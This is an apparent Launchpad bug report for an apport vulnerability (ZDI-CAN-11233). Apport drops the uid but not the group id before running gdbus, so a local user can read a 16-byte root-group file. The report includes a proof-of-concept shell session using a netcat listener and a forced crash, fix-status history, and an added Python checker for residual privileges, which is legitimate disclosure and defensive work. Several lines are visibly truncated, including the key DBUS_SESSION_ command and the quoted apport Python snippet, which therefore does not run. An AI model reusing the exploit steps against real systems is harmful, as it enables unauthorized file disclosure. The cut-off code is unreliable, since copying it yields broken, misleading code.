[ZDI-CAN-11233]: apport Unnecessary Privileges Information Disclosure Vulnerability
Affects | Status | Importance | Assigned to | Milestone |
---|---|---|---|---|
Apport | Fix Released | Medium | Unassigned | |
apport (Ubuntu) | Fix Released | Medium | Unassigned | |
Xenial | Fix Released | Medium | Unassigned | |
Bionic | Fix Released | Medium | Unassigned | |
Eoan | Won't Fix | Medium | Unassigned | |
Focal | Fix Released | Medium | Unassigned | |
Bug Description
-- VULNERABILITY DETAILS -------
* Version tested: 18.04.4 LTS amd64 server
* Installer file: ubuntu-
* Platform tested: -
---
### Analysis
Apport, which is the crash reporter in Ubuntu, executes gdbus to check whether the pid is in a closing user session. Before executing the binary, it drops privileges to the crashed process's uid. But it doesn't drop the group id, so it can be used to leak a file which is owned by the root group.
This allows anyone to read a file which can only be read by the root group, but the file size must be 16 bytes.
Reproduction steps
```
ubuntu@ubuntu:/tmp$ echo -ne "SECURESECRETHERE" > securefile
ubuntu@ubuntu:/tmp$ sudo chown root:root securefile
ubuntu@ubuntu:/tmp$ sudo chmod 440 securefile
ubuntu@ubuntu:/tmp$ su - zdi
Password:
zdi@ubuntu:~$ id
uid=1001(zdi) gid=1001(zdi) groups=1001(zdi)
zdi@ubuntu:~$ cd /tmp/
zdi@ubuntu:/tmp$ ls -al securefile
-r--r----- 1 root root 16 Jun 16 04:33 securefile
zdi@ubuntu:/tmp$ cat securefile
cat: securefile: Permission denied
zdi@ubuntu:/tmp$ nc -lp 8888 &
[1] 2034
zdi@ubuntu:/tmp$ DBUS_SESSION_
[2] 2036
zdi@ubuntu:/tmp$ kill -11 2036
zdi@ubuntu:/tmp$ SECURESECRETHER
zdi@ubuntu:/tmp$
```
~~~python
orig_uid = os.geteuid()
os.
try:
    gdbus = subprocess.
    (out, err) = gdbus.communicate()
    if err:
except OSError as e:
    return False
finally:
~~~
-- CREDIT -------
This vulnerability was discovered by:
Ryota Shiga(@Ga_ryo_) of Flatt Security working with Trend Micro Zero Day Initiative
description: updated
information type: Private Security → Public Security
Changed in apport (Ubuntu Eoan):
status: Confirmed → Won't Fix
Changed in apport:
status: New → Fix Released
milestone: none → 2.21.0
importance: Undecided → Medium
Reproduced on focal. Setting the priority to medium due to the requirement that the root group file to be targeted must be exactly 16 bytes in size.
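Added example (not apport's code and not part of the original report): a Python check for the class of bug described above, where only the effective uid is switched before a helper is run, next to a helper launch that replaces uid, gid and supplementary groups together. The id 1001 and the `LEAKY` snapshot are constructed, and `run_as` is a hypothetical helper that assumes Python 3.9+ for the `user`, `group` and `extra_groups` arguments of `subprocess`.

```python
import os
import subprocess

def snapshot():
    """Capture every credential the kernel consults for file access."""
    ruid, euid, suid = os.getresuid()
    rgid, egid, sgid = os.getresgid()
    return {"ruid": ruid, "euid": euid, "suid": suid,
            "rgid": rgid, "egid": egid, "sgid": sgid,
            "groups": sorted(os.getgroups())}

def residual_privileges(creds, uid, gid, groups=()):
    """List the credentials in `creds` that still differ from the target."""
    leftovers = []
    for name in ("ruid", "euid", "suid"):
        if creds[name] != uid:
            leftovers.append(f"{name}={creds[name]}")
    for name in ("rgid", "egid", "sgid"):
        if creds[name] != gid:
            leftovers.append(f"{name}={creds[name]}")
    # Supplementary groups grant file access just like the primary gid.
    extra = sorted(set(creds["groups"]) - set(groups) - {gid})
    if extra:
        leftovers.append(f"groups={extra}")
    return leftovers

def run_as(argv, uid, gid, groups=()):
    """Hypothetical helper: run argv with uid, gid and supplementary groups
    all replaced in the child. Requires root in the calling process."""
    return subprocess.run(argv, user=uid, group=gid,
                          extra_groups=list(groups),
                          capture_output=True, check=False)

# Constructed snapshot: a root process that switched only its effective uid
# to 1001, as in the report's description of the gdbus call.
LEAKY = {"ruid": 0, "euid": 1001, "suid": 0,
         "rgid": 0, "egid": 0, "sgid": 0, "groups": [0]}

if __name__ == "__main__":
    print("constructed leaky state:", residual_privileges(LEAKY, 1001, 1001))
    me = snapshot()
    print("this process vs. its own euid/egid:",
          residual_privileges(me, me["euid"], me["egid"], me["groups"]))
```

Any non-empty result from `residual_privileges` means a child started in that state can still open files through the listed ids, which is the condition the reproduction steps rely on.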